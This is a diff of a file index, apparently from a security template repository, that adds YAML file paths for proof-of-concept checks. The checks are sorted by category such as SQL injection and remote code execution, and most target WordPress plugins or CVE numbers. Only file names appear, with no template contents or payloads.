+./poc/other/photo-video-store-9887b9e8aa29c789cc721ef3d676a573.yaml
./poc/other/photo_station.yaml
./poc/other/photoblocks-grid-gallery-070e7c21dac14e93cbf5c4592da9e0a2.yaml
./poc/other/photoblocks-grid-gallery-175b78dcaa33f1642305da0ef2e8d7be.yaml
@@ -103282,6 +103462,7 @@
./poc/other/pixgraphy.yaml
./poc/other/pixiv-custom-5d898145396c89d16d93fe047e5b3e70.yaml
./poc/other/pixiv-custom.yaml
+./poc/other/pixobe-cartography-b8d402b7f8267a8fbeabdc06350287fa.yaml
./poc/other/pixova-lite-66ba1859ab560343222a23f4bdd2510b.yaml
./poc/other/pixova-lite-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/pixova-lite.yaml
@@ -103377,6 +103558,7 @@
./poc/other/plg_novana.yaml
./poc/other/pliska-405fe484522342f309e572b6f863f171.yaml
./poc/other/pliska.yaml
+./poc/other/plugin-951ffa4455cde2cf84338c23f5961c7d.yaml
./poc/other/plugin-central-81d9389612a1afe16ac9117292098b3e.yaml
./poc/other/plugin-central-b751676df4d35907e4c217f2ebe354a1.yaml
./poc/other/plugin-central-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -103804,6 +103986,7 @@
./poc/other/post-carousel-ea57fce45364f30b01a71e0b6cc7d73e.yaml
./poc/other/post-carousel-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/post-carousel-plugin.yaml
+./poc/other/post-carousel-slider-for-elementor-7ce3093d4f3e9adea14ad773b3a3df2a.yaml
./poc/other/post-carousel.yaml
./poc/other/post-category-image-with-grid-and-slider-375a5b2c1df41c6d0e13cd16d3e7f19b.yaml
./poc/other/post-category-image-with-grid-and-slider.yaml
@@ -104096,6 +104279,7 @@
./poc/other/powerpack-lite-for-elementor-4ae4b5ba374699fdefe1d0fca67d1b72.yaml
./poc/other/powerpack-lite-for-elementor-801a4fd099de84e12762e37f19f06b41.yaml
./poc/other/powerpack-lite-for-elementor-9729d1323c28fdfde4e709e181d20940.yaml
+./poc/other/powerpack-lite-for-elementor-a7a3589609ae92e0dc1bd8b339906582.yaml
./poc/other/powerpack-lite-for-elementor-f6e2cb44c541528e4bdd396f627b6a7f.yaml
./poc/other/powerpack-lite-for-elementor.yaml
./poc/other/powerpress-1e3d37c0409f287ef569ee57bf8b5111.yaml
@@ -104686,6 +104870,7 @@
./poc/other/publishpress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/publishpress-plugin.yaml
./poc/other/publishpress.yaml
+./poc/other/pubnews-5b335bb90b570f570873fbfa38b47c5b.yaml
./poc/other/pubsab-malware.yaml
./poc/other/pubsubhubbub-8b9f60491d53b8c8e4056727f71c36e9.yaml
./poc/other/pubsubhubbub.yaml
@@ -105220,6 +105405,7 @@
./poc/other/rancher-panel.yaml
./poc/other/rancher-workflow.yaml
./poc/other/rancher.yaml
+./poc/other/random-banner-0b21c7eea2233a52fab8c4a62c453192.yaml
./poc/other/random-banner-5f9bd55dfb4886d9971e3280798324ec.yaml
./poc/other/random-banner-66e79d43b9bf633ecf7f76918cf8d85b.yaml
./poc/other/random-banner-aa7a1aee86bb07fd299ad157b2709702.yaml
@@ -105305,6 +105491,7 @@
./poc/other/rbsoft-software.yaml
./poc/other/rbxgallery-0afd09d3bebe9f136a82dc448971c35c.yaml
./poc/other/rbxgallery.yaml
+./poc/other/rccp-free-addabdad3f0edc1afcad78dcfe322e09.yaml
./poc/other/rd-wc-order-modifier-95c2fea175252b462658a5ecb1a18747.yaml
./poc/other/rd-wc-order-modifier-983b6e1fd4f4de142422f08e7915e1b6.yaml
./poc/other/rd-wc-order-modifier-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -108054,6 +108241,7 @@
./poc/other/simple-popup-newsletter.yaml
./poc/other/simple-popup-plugin-2bd36fdc29b22dc0d0684dee04b24952.yaml
./poc/other/simple-popup-plugin-5287b8f51d53c1caefc3ecc634903892.yaml
+./poc/other/simple-popup-plugin-cf96f5f0cc1e34ba0f87c5a246e6b6a7.yaml
./poc/other/simple-popup-plugin.yaml
./poc/other/simple-popup.yaml
./poc/other/simple-portfolio-gallery-c823a8c32782388082e34fa9dc4f43bc.yaml
@@ -108240,6 +108428,7 @@
./poc/other/simplepress-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/simplepress-e3965c8d4e66020e113c368a7914c8c3.yaml
./poc/other/simplepress.yaml
+./poc/other/simpleschema-free-d19ba041fbf80d78fb62d140a19bbe1d.yaml
./poc/other/simpleshop-cz-70583275df8a8d66c89e3e54c1e38c92.yaml
./poc/other/simpleshop-cz-995fe677d959107577aa1354e02a9b05.yaml
./poc/other/simpleshop-cz.yaml
@@ -108436,6 +108625,7 @@
./poc/other/sky-elementor-addons-e1e3d7e83d6ee08aac98fd9f64280dd4.yaml
./poc/other/sky-elementor-addons.yaml
./poc/other/sky-phish.yaml
+./poc/other/skyboot-portfolio-gallery-b1da3f38e609312a5083d34cf5925003.yaml
./poc/other/skycaiji-admin-panel-10304.yaml
./poc/other/skycaiji-admin-panel-10305.yaml
./poc/other/skycaiji-admin-panel-10306.yaml
@@ -108665,6 +108855,7 @@
./poc/other/smart-maintenance-mode.yaml
./poc/other/smart-mockups-b1f443189eb688858fd0760beeec94dd.yaml
./poc/other/smart-mockups.yaml
+./poc/other/smart-popup-blaster-30df007059118a37ebbef148c110f5c7.yaml
./poc/other/smart-recent-posts-widget-d88f3f455f89003fa5734c525e70e76b.yaml
./poc/other/smart-recent-posts-widget.yaml
./poc/other/smart-seo-tool-1e322b6ba0f76d96af5775520509b483.yaml
@@ -108845,6 +109036,7 @@
./poc/other/softether-vpn.yaml
./poc/other/softnext-spam-sqr反垃圾邮件系统.yaml
./poc/other/softnext-spam.yaml
+./poc/other/softtemplates-for-elementor-ecddfed759e913087d218b9e237f2c06.yaml
./poc/other/software-integrity-failures.yaml
./poc/other/software-license-manager-02438a90e5cab2e347474ab67e16a2e0.yaml
./poc/other/software-license-manager-08f24ceaa9760ed4a8e1dcab46bbae35.yaml
@@ -108883,6 +109075,7 @@
./poc/other/solarwinds-orion.yaml
./poc/other/solarwinds.yaml
./poc/other/soledad-08fdc0fa4fb6c4def2e2333a78ea6b73.yaml
+./poc/other/soledad-29fa607193cd3b39b09ca02b2ce4f403.yaml
./poc/other/soledad-37b9a8efffbd7fda52057c09793a9115.yaml
./poc/other/soledad-46b9c25417dc1916d1b92681c94a5b3d.yaml
./poc/other/soledad-55ed48a13b9d19cfc1668b1676a5c21b.yaml
@@ -109062,6 +109255,7 @@
./poc/other/spark.yaml
./poc/other/sparkle-demo-importer-7bee5b1af940c855c62dfdccf8baf946.yaml
./poc/other/sparkle-demo-importer.yaml
+./poc/other/sparkle-elementor-kit-4c18bc0aa3ca26a81086e7ea47ef5b19.yaml
./poc/other/sparklestore-236bed5b5a49a6173251e991d6ca44d1.yaml
./poc/other/sparklestore-d2a46afd6d61289094ec49e6cf79a7c7.yaml
./poc/other/sparklestore.yaml
@@ -109209,6 +109403,7 @@
./poc/other/spin360.yaml
./poc/other/spip-install.yaml
./poc/other/spip.yaml
+./poc/other/splash-connector-a408956eb25c0fc5ebb6237dc9efaaab.yaml
./poc/other/splash-rendering-service.yaml
./poc/other/splashscreen-e99cd6f52d6ff45048d4d7eaafac3dec.yaml
./poc/other/splashscreen.yaml
@@ -109982,6 +110177,7 @@
./poc/other/sv-provenexpert.yaml
./poc/other/sv-tracking-manager-cf663949cda235c9ea12aa65dd114d87.yaml
./poc/other/sv-tracking-manager.yaml
+./poc/other/sv100-companion-9407692ccefc1b1607863a7068a9481a.yaml
./poc/other/svg-block-6ffe8bb8705f516ed225e4cda177f560.yaml
./poc/other/svg-block-dc4f23aceeda39e46a3f1145d98bd672.yaml
./poc/other/svg-block.yaml
@@ -110040,6 +110236,7 @@
./poc/other/swift-framework-30d3f5776ed35230993fad52196a3d03.yaml
./poc/other/swift-framework.yaml
./poc/other/swift-performance-lite-03ea7bc0944040c0164e11ef3d52374f.yaml
+./poc/other/swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6.yaml
./poc/other/swift-performance-lite-ff16d085629ee3b61efab5d02050c62e.yaml
./poc/other/swift-performance-lite.yaml
./poc/other/swifty-bar-55e944853212366688eada78aebb13f0.yaml
@@ -111688,6 +111885,7 @@
./poc/other/twenty20.yaml
./poc/other/twentyfifteen-e9f7cbc36c5c4d5fb72ef5ac394aedde.yaml
./poc/other/twentyfifteen.yaml
+./poc/other/twentytwenty-008f64526c3780ff8f14b386a2edcab8.yaml
./poc/other/twigify-4ae6138a64b6a684977cb2a70738b6dc.yaml
./poc/other/twigify.yaml
./poc/other/twitcasting.yaml
@@ -111736,6 +111934,7 @@
./poc/other/uac-elevate-without-prompt.yaml
./poc/other/uag2100.yaml
./poc/other/uag2100_firmware.yaml
+./poc/other/uber-grid-356fe3fbd1593fabd8654043fb4bf3f8.yaml
./poc/other/uber-grid-98670d29e16e4f4770b4bbde2adf0646.yaml
./poc/other/uber-grid.yaml
./poc/other/uber-phish.yaml
@@ -111918,6 +112117,8 @@
./poc/other/ultimate-classified-listings-7d58dd9b18a638181ffbe094af3eae4d.yaml
./poc/other/ultimate-classified-listings-a55b916c304c51a1b04f17b6dc5ad876.yaml
./poc/other/ultimate-classified-listings.yaml
+./poc/other/ultimate-coming-soon-1b1151732f9e837b52353dea3817cd15.yaml
+./poc/other/ultimate-coming-soon-be5df66158fd08241f78579ea8d369cd.yaml
./poc/other/ultimate-dashboard-2d6c980f1b71a4137c918fd86f88e6b9.yaml
./poc/other/ultimate-dashboard-5faff98325793a73dd67f7cf4ee8d8eb.yaml
./poc/other/ultimate-dashboard-7277279061009a48883dc0e06b350b6d.yaml
@@ -113598,6 +113799,7 @@
./poc/other/watu-1ead06580a956da08d97a649f0788258.yaml
./poc/other/watu-4d628125cd756c9f2c511f4167431a3b.yaml
./poc/other/watu-5c073ba6bf6c7c87161a498fbf10ad3e.yaml
+./poc/other/watu-690d8bcd0e263bad7d88f01f7c626e23.yaml
./poc/other/watu-9062ef8924f40d9755450f4c54d45f3f.yaml
./poc/other/watu-92a420959f8536c6c5dda3bafbacbab3.yaml
./poc/other/watu-9830d337b08b250a99a60ff90962857e.yaml
@@ -114081,6 +114283,7 @@
./poc/other/wip-incoming-lite-cf7facf8e3af34332be0173ed93179a2.yaml
./poc/other/wip-incoming-lite.yaml
./poc/other/wip-woocarousel-lite-58c536c08bbfd58c8c5df3f776075f47.yaml
+./poc/other/wip-woocarousel-lite.yaml
./poc/other/wireclub.yaml
./poc/other/wireguard-preshared.yaml
./poc/other/wireless-access-point-controller.yaml
@@ -114466,6 +114669,7 @@
./poc/other/woo-pdf-invoice-builder-5bd45b3163617189ce7308fb26a11801.yaml
./poc/other/woo-pdf-invoice-builder-71b40029fdfb6655eeea274a86ce417a.yaml
./poc/other/woo-pdf-invoice-builder-843948fd1f1b86a6e7d550c861ad1ed8.yaml
+./poc/other/woo-pdf-invoice-builder-b3d98dd124afa7dc460f57d96fd05347.yaml
./poc/other/woo-pdf-invoice-builder.yaml
./poc/other/woo-pdf-invoices-bulk-download-472842e06756dc17bab4168ce9177b37.yaml
./poc/other/woo-pdf-invoices-bulk-download-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -115180,6 +115384,7 @@
./poc/other/xiuno.yaml
./poc/other/xjhtqy-crm.yaml
./poc/other/xjhyt-system.yaml
+./poc/other/xl-tab-40f41253ca6b22bb907999b982dcace4.yaml
./poc/other/xl-tab-c1541f5d341255cfb7d8669f748f395e.yaml
./poc/other/xl-tab.yaml
./poc/other/xllentech-english-islamic-calendar-1d5b04bee2df8076985b3802622f831c.yaml
@@ -115280,6 +115485,7 @@
./poc/other/yada-wiki-0e04c450c7a6033c90d580fe0890dc93.yaml
./poc/other/yada-wiki.yaml
./poc/other/yahoo-japan-auction.yaml
+./poc/other/yahoo-media-player-6d6ac328025439c4bf1dd52ca758d69c.yaml
./poc/other/yahoo-phish.yaml
./poc/other/yamaps-f9146b05cc50468ff3e1ed6ab1cd8fe0.yaml
./poc/other/yamaps.yaml
@@ -115816,6 +116022,7 @@
./poc/other/zlick-paywall.yaml
./poc/other/zm-gallery.yaml
./poc/other/zmarsacom.yaml
+./poc/other/znajdz-prace-z-pracapl-f64257e15582ca43c7ad0a549fe64fd8.yaml
./poc/other/zoho-campaigns-67bb4e69a169a782467f485fb6cfcf93.yaml
./poc/other/zoho-campaigns-8ef70bd21a986de5c011a40971fa9a78.yaml
./poc/other/zoho-campaigns-cc101221171fc689aa4c8dd1485aaa4d.yaml
@@ -116943,6 +117150,7 @@
./poc/remote_code_execution/account-manager-woocommerce-198aaf82d5ab4648c4ab1ac1d78a7c90.yaml
./poc/remote_code_execution/account-manager-woocommerce.yaml
./poc/remote_code_execution/accounting-for-woocommerce-53b52ac147da254acf1412f550aa0c64.yaml
+./poc/remote_code_execution/accounting-for-woocommerce.yaml
./poc/remote_code_execution/acf-for-woocommerce-product-5f5d0f52c1d912f42f77906eaf762cdd.yaml
./poc/remote_code_execution/acf-for-woocommerce-product-6477bf18cad6c823db485408d49b337b.yaml
./poc/remote_code_execution/acf-for-woocommerce-product.yaml
@@ -118176,6 +118384,7 @@
./poc/remote_code_execution/more-better-reviews-for-woocommerce.yaml
./poc/remote_code_execution/mq-woocommerce-products-price-bulk-edit-1af1bfa2b2a7cb0a9db573b3931a0491.yaml
./poc/remote_code_execution/mq-woocommerce-products-price-bulk-edit.yaml
+./poc/remote_code_execution/multilevel-referral-plugin-for-woocommerce-20b3dc25777d2d4d55cfa2c7a3d7144f.yaml
./poc/remote_code_execution/multiparcels-shipping-for-woocommerce-1076c5f355a65534e72ef51489341d2f.yaml
./poc/remote_code_execution/multiparcels-shipping-for-woocommerce-3dcd3ff11562779966f412aa5b51000d.yaml
./poc/remote_code_execution/multiparcels-shipping-for-woocommerce-522568ff6baf34c6f7bed5d2ee776244.yaml
@@ -118236,10 +118445,12 @@
./poc/remote_code_execution/next-order-coupon-woocommerce-b7c5fef4e19b4435bd19c7ddc442fdea.yaml
./poc/remote_code_execution/next-order-coupon-woocommerce-ff9293ba28748efa2ab9a2fe77385468.yaml
./poc/remote_code_execution/next-order-coupon-woocommerce.yaml
+./poc/remote_code_execution/nextcart-woocommerce-migration-2e2806962d8874bbd69c8d26bf481248.yaml
./poc/remote_code_execution/nginx-webui-rce.yaml
./poc/remote_code_execution/nginxwebui-runcmd-rce.yaml
./poc/remote_code_execution/ni-purchase-orderpo-for-woocommerce-d3a637fd2d20648c0d7b44bd37557752.yaml
./poc/remote_code_execution/ni-purchase-orderpo-for-woocommerce.yaml
+./poc/remote_code_execution/ni-woocommerce-cost-of-goods-66898c5242c9d33ba57cb7fe04ac3a35.yaml
./poc/remote_code_execution/ni-woocommerce-custom-order-status-c82f3bfb0227cd93471796cd6ad7019e.yaml
./poc/remote_code_execution/ni-woocommerce-custom-order-status.yaml
./poc/remote_code_execution/ni-woocommerce-sales-report-8a31f44eb6f99b33cb133332f49866d6.yaml
@@ -119985,6 +120196,7 @@
./poc/remote_code_execution/woocommerce-support-ticket-system-c55b90eb13850c1f21f1569dfb76cac8.yaml
./poc/remote_code_execution/woocommerce-support-ticket-system-f22cd57903a5b9c81a6842d03c2e5a79.yaml
./poc/remote_code_execution/woocommerce-support-ticket-system.yaml
+./poc/remote_code_execution/woocommerce-ultimate-gift-card-f2d90f9b034e1f97969a83011a928867.yaml
./poc/remote_code_execution/woocommerce-upcoming-product-6477bf18cad6c823db485408d49b337b.yaml
./poc/remote_code_execution/woocommerce-upcoming-product-ff9293ba28748efa2ab9a2fe77385468.yaml
./poc/remote_code_execution/woocommerce-upcoming-product.yaml
@@ -121142,6 +121354,7 @@
./poc/search/smartsearchwp.yaml
./poc/search/sort-searchresult-by-title-86feb80f760342151e6b43a07a4c470f.yaml
./poc/search/sort-searchresult-by-title.yaml
+./poc/search/spatialmatch-free-lifestyle-search-67ee26ea0af5450a37293a361423bdd3.yaml
./poc/search/sphinxsearch-config.yaml
./poc/search/sw_ajax_woocommerce_search-5ce78f9939b9150d27f312b9585f1d7a.yaml
./poc/search/sw_ajax_woocommerce_search-c4bf0c010e385ed4f61abcf59a51504f.yaml
@@ -124046,6 +124259,7 @@
./poc/sql/CVE-2024-1080-15318692234db11db0354155dd2f2282.yaml
./poc/sql/CVE-2024-10851-dbe7b5e4e9cfdb363f696ddca5d2335c.yaml
./poc/sql/CVE-2024-10854-dc294b17b7eb8d67dbabdea0e0fccc45.yaml
+./poc/sql/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml
./poc/sql/CVE-2024-10878-2a6958b657c7efaf0d338a4aea9db038.yaml
./poc/sql/CVE-2024-10890-007744aef7f83fa0ee95dbf3047ac5b2.yaml
./poc/sql/CVE-2024-10899-e69dd2249584b3a0690feee574c3db8b.yaml
@@ -124055,8 +124269,10 @@
./poc/sql/CVE-2024-10961-c22c374f4ffe67db892c953e4cf45c93.yaml
./poc/sql/CVE-2024-11088-564fc5eaafcf306cc1db90950bcd86ec.yaml
./poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml
+./poc/sql/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml
./poc/sql/CVE-2024-1118-d2488e79cdb18e5fa6f4b114e5fd1973.yaml
./poc/sql/CVE-2024-11197-b1a29e2fb93e8f055bb485dbbb4122a8.yaml
+./poc/sql/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml
./poc/sql/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml
./poc/sql/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml
./poc/sql/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml
@@ -124072,10 +124288,14 @@
./poc/sql/CVE-2024-11412-b7f9a59e3648736328457db943a1aa23.yaml
./poc/sql/CVE-2024-11438-466e48b3dc4ddb929568c36634c56fb1.yaml
./poc/sql/CVE-2024-11440-b26a27e98ac4778bf1db64f0d89b26d0.yaml
+./poc/sql/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml
+./poc/sql/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml
./poc/sql/CVE-2024-11455-20245b95e832be32aa78c5dcdb250fbb.yaml
./poc/sql/CVE-2024-1158-c524eecd9e35e784bb852f087dadba65.yaml
./poc/sql/CVE-2024-11620-979089a4744c95c4c6431c18c0d453db.yaml
+./poc/sql/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml
./poc/sql/CVE-2024-1173-9e9606db29cc691b1619adba347c82df.yaml
+./poc/sql/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml
./poc/sql/CVE-2024-1209-262fb41bb4526e178dfcbc92b07bdb7c.yaml
./poc/sql/CVE-2024-1293-affd9a0551db020dec750cedbcd3816e.yaml
./poc/sql/CVE-2024-1294-dfdb0dbdfc95da5675d873e172a0e0c4.yaml
@@ -124457,6 +124677,7 @@
./poc/sql/CVE-2024-3940-c77e604f97e35956017cf6a68db15f39.yaml
./poc/sql/CVE-2024-3952-e82e7f7b55b1a2cdb9c63c74403002dd.yaml
./poc/sql/CVE-2024-3954-d300f84586929db533ba549a8c5271bc.yaml
+./poc/sql/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml
./poc/sql/CVE-2024-39627-4a34ef4adb6554c40e87a30e6b5db2d1.yaml
./poc/sql/CVE-2024-39629-21a0d1e8bc7085b87d4ec991fcdbb5fd.yaml
./poc/sql/CVE-2024-3963-731de2d0a4c69dba27660c9868757277.yaml
@@ -124694,6 +124915,10 @@
./poc/sql/CVE-2024-53719-b4493181ccba3e1197dbf7fce74940cf.yaml
./poc/sql/CVE-2024-53721-b5cfee65491f0247c2f1fdb0949e9d6f.yaml
./poc/sql/CVE-2024-53726-1e919e9d2a69b020a76e46d4db30570d.yaml
+./poc/sql/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml
+./poc/sql/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml
+./poc/sql/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml
+./poc/sql/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml
./poc/sql/CVE-2024-5431-241e169fe8d70647db15866852ef1ef7.yaml
./poc/sql/CVE-2024-5441-ac5094c9721ab0d78dbe312bf4fbf927.yaml
./poc/sql/CVE-2024-5459-5fe3da3314db32ae5a24560dc5ca6f8d.yaml
@@ -125550,6 +125775,7 @@
./poc/sql/beescms_v3-login-sql-injection.yaml
./poc/sql/beescms_v4-login-sqli.yaml
./poc/sql/before-and-after-product-images-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/best-addons-for-elementor-bd743f52479cb010ad232ebee7dbf30b.yaml
./poc/sql/best-bootstrap-widgets-for-elementor-aedbca6edd060e8a69fdd7760bb9fe9f.yaml
./poc/sql/betheme-2738eb196d5cf7002027db186214d929.yaml
./poc/sql/betheme-71b13c5e1eda36a90193edb1421a40a0.yaml
@@ -125582,6 +125808,7 @@
./poc/sql/bft-autoresponder-410c06116fe1a48aeddb5876065bb3ed.yaml
./poc/sql/bigcommerce-e42ef8d39a3467d5e1a7baf1b678f8db.yaml
./poc/sql/bigcontact-d285769ee06ff62690a211e623fe0db4.yaml
+./poc/sql/bin-stripe-donation-26be16d9007bef8defcdb810970efcf9.yaml
./poc/sql/bingle-3657db267ffb9fa9585f7dda5be77b5d.yaml
./poc/sql/biometric-login-for-woocommerce-56a06f7ec0c2351c343ea2384b7dbd44.yaml
./poc/sql/bit-form-3d27ce4cf07eddb00a73dc6a8eb2fa2a.yaml
@@ -125761,6 +125988,7 @@
./poc/sql/canvas-85dba4da99018ec5002875cc774204af.yaml
./poc/sql/canvas-cc9db930f569b6837ab5aed1f9582e62.yaml
./poc/sql/canvasio3d-light-afe02b616299fe661a744ebe8dbd9776.yaml
+./poc/sql/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
./poc/sql/captainform-bd412ac944fb4a7c5600d8dbbfb662bc.yaml
./poc/sql/captcha-d31b1c8c716a9d93fe1fbd75b1dbb125.yaml
./poc/sql/captcha-in-thai-a8aa19e5f73bcebc92ee846ddb45e746.yaml
@@ -125836,6 +126064,7 @@
./poc/sql/chatbot-b038bef7869b3706efa20fdb3d87a82d.yaml
./poc/sql/chatbot-b22ff0dbd98aa4f5a4d08888fadce284.yaml
./poc/sql/chatbot-e59db0430d299064f582993dd5ae7c3b.yaml
+./poc/sql/chatter-50f846e0f4847e28db594b1f3b22c537.yaml
./poc/sql/chaty-54b4df3ad52973902fbee4db2574a283.yaml
./poc/sql/chauffeur-booking-system-47b382c141e0bdf017dbc2d5f6a6abb1.yaml
./poc/sql/cherry-plugin-10e90184e935e318fb6118f56edb0f78.yaml
@@ -125999,6 +126228,7 @@
./poc/sql/contact-us-page-contact-people-34edb96c9ab0661038d2eccd212e324c.yaml
./poc/sql/contact-us-page-contact-people-bfa85b6db67d591aac2f6f71df4a2f6a.yaml
./poc/sql/contact-widgets-for-elementor-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/content-audit-exporter-e79372032f3cd9964820840ddb7f0ea3.yaml
./poc/sql/content-aware-sidebars-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/content-grabber-9cd8c8d91245df8880525bdb80e2a804.yaml
./poc/sql/content-protector-19b0cf5ebdbef78878d163d48f84b32e.yaml
@@ -126066,6 +126296,7 @@
./poc/sql/count-per-day-311cd82477fed81bb66239db49d949d3.yaml
./poc/sql/countdown-builder-466d118ca8f9a3617f4ecdb86e11688a.yaml
./poc/sql/countdown-time-d49b34cc4749bcddb6c0d98a35fdb653.yaml
+./poc/sql/countdown-timer-for-elementor-e125cc11edbf54c4514f0c2218a86a07.yaml
./poc/sql/counter-yandex-metrica-c194310014d30316dbbe28440ddf1a9d.yaml
./poc/sql/counterpoint-4e848d0e70e34ae5f5dbfea5a0844aac.yaml
./poc/sql/country-state-city-auto-dropdown-dbb36fa80809f3531c17675200623d4b.yaml
@@ -126100,6 +126331,7 @@
./poc/sql/csz-cms-multiple-blind-sql-injection.yaml
./poc/sql/csz-cms-sqli.yaml
./poc/sql/cuisine-palace-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/cultbooking-booking-engine-5eb904d4a3173fdb3278f6a25598e63f.yaml
./poc/sql/currency-switcher-ddbcd2d90a5d069d6e14c0fea6254c46.yaml
./poc/sql/current-template-name-4e0b3f5938dbbcb7b6d25d649232d602.yaml
./poc/sql/curtain-cdf892b1bdb65554becd13f5d97445be.yaml
@@ -127730,6 +127962,7 @@
./poc/sql/myblogu-a759e03a3140ab5da9f810ffbdb3a4c2.yaml
./poc/sql/mybooktable-4ef7dcbfb2a4ff3772362d316ebe9ddb.yaml
./poc/sql/mycred-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
./poc/sql/mycred-e577923b04d9cbb1dba64e0256a4900d.yaml
./poc/sql/myriad-e7ede6314c209b97480a8f0916dbaa81.yaml
./poc/sql/mysql-default-login.yaml
@@ -127911,6 +128144,7 @@
./poc/sql/os-our-team-5e9ed8ddbc29a65b56b40fb1593a5b78.yaml
./poc/sql/ota-sync-booking-engine-widget-e6eadc3c1846bf39dbc1745d98cc5942.yaml
./poc/sql/otter-blocks-15c5581c7f12dbec33c590f64d738d01.yaml
+./poc/sql/out-of-stock-badge-824e800865ecf93bf8922dba7aad4e65.yaml
./poc/sql/out-of-stock-display-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/out-of-the-box-528db542bd643fe3ab8026c257a827c4.yaml
./poc/sql/overlay-image-divi-module-6477bf18cad6c823db485408d49b337b.yaml
@@ -127961,6 +128195,7 @@
./poc/sql/payment-gateway-payfabric-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/payment-gateway-stripe-and-woocommerce-integration-988d55592a55e8dbec9b2b183fa815e4.yaml
./poc/sql/payment-gateways-caller-for-wp-e-commerce-149513668ca0531327db1429515bc204.yaml
+./poc/sql/paypal-responder-2bb28c0dbe7d31806c826438ecefef2f.yaml
./poc/sql/payplus-payment-gateway-a3aef2bebedbebc3212e421675dbad01.yaml
./poc/sql/paytium-176f9dc136ebe7ea745156cdb0054554.yaml
./poc/sql/paytium-6bfa7db55abe86e184a7874b8579256d.yaml
@@ -128055,6 +128290,7 @@
./poc/sql/pixgraphy-fd1668db1ee6120d9e9e1b481cd44501.yaml
./poc/sql/pixtypes-38d12a3ee1af1016d763a66f9b3fdb77.yaml
./poc/sql/player-c01dbc3d918342ab9261fcf9f834d00f.yaml
+./poc/sql/plugin-5dcfaa6624128695b8dbff266dad887f.yaml
./poc/sql/plugins-on-steroids-3c5e646c22c4a2ee0780b32e276ba0db.yaml
./poc/sql/pmb-sqli.yaml
./poc/sql/pmpro-ccbill-ca203c1416f8db65ff994af39c261ed6.yaml
@@ -129250,6 +129486,8 @@
./poc/sql/vbulletin-ajaxreg-sqli.yaml
./poc/sql/vbulletin-search-sqli.yaml
./poc/sql/verbalize-wp-d2642c9976dd79a81dbb8a04d84d3984.yaml
+./poc/sql/verowa-connect-e19e41c4fd554c823dba2f39d46b632a.yaml
+./poc/sql/vertical-carousel-slider-02cbab9c2d567c8a51e8bba1e79d8db9.yaml
./poc/sql/viala-db2c68eeb70fb7b246821a2cd4518cb8.yaml
./poc/sql/video-conferencing-with-zoom-api-cada35bdbe5e2a0f3053da42343b771e.yaml
./poc/sql/video-contest-dcdbdb7c718f0791fb8fb1ab6aee662f.yaml
@@ -129927,6 +130165,7 @@
./poc/sql/wp-mail-smtp-pro-bf99af0b560ff84ba93dbeab4c84cecc.yaml
./poc/sql/wp-maintenance-mode-site-under-construction-3f94aced36dbd4328dad691c27a54184.yaml
./poc/sql/wp-media-folder-54aa91e59ecdb8a0126b1e5e8e9c3823.yaml
+./poc/sql/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
./poc/sql/wp-megamenu-fe36f95770875e296f0157be9db6db9f.yaml
./poc/sql/wp-members-7aa36ba12939bcdb73e6e0450931851d.yaml
./poc/sql/wp-members-8db9f530e08181a4bd6b357664b8db50.yaml
@@ -134208,6 +134447,7 @@
./poc/web/wp-gotowebinar-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/web/wp-gotowebinar-plugin.yaml
./poc/web/wp-gotowebinar.yaml
+./poc/web/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
./poc/web/wp-webauthn-71441abab831c852cabdfcf51b578c3f.yaml
./poc/web/wp-webauthn-f28b000296f06a779e749742a94d7bfb.yaml
./poc/web/wp-webauthn.yaml
@@ -135008,6 +135248,8 @@
./poc/wordpress/formzu-wp-de3eef28bc5bff1cda8149a94e46b8a8.yaml
./poc/wordpress/formzu-wp.yaml
./poc/wordpress/forumwp-347948842ffe543c41596a9aa3dda87d.yaml
+./poc/wordpress/forumwp-aaeb37a4320ca1cfa0565e89a95a01bb.yaml
+./poc/wordpress/forumwp-b74a371b4e61bc84d659569310ff3232.yaml
./poc/wordpress/forumwp.yaml
./poc/wordpress/fotawp-d622eb8bcbd4b333fcc853cc76fee77e.yaml
./poc/wordpress/fotawp.yaml
@@ -135927,6 +136169,7 @@
./poc/wordpress/smart-manager-for-wp-e-commerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/smart-manager-for-wp-e-commerce-plugin.yaml
./poc/wordpress/smart-manager-for-wp-e-commerce.yaml
